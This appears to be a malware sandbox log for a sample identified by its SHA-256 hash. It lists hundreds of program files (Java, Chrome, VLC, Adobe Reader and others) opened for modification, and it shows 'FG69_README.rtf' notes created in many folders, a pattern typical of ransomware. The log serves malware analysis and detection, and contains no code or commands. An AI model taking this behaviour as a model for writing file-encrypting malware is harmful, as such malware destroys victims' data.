d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\tr.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\README.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Cairo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Detroit d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\kn.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-api-caching.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guyana d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dubai d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\manifest.json d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Iqaluit d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\rmid.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UCT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tongatapu d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services_1.1.0.v20140328-1925.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-8 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200723104248.pma d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook.bat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\management-agent.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ro.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Broken_Hill d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Danmarkshavn d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\release d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hu.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cordoba d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Araguaina d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Resolute d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\platform.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Seoul d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_it.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\kinit.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javap.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tokyo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh87 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Paramaribo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MET d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\localedata.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Lagos d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Copenhagen d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Urumqi d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Monticello d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.RSA d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Moncton d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Dublin d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Macau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Winnipeg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoCanary.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zurich 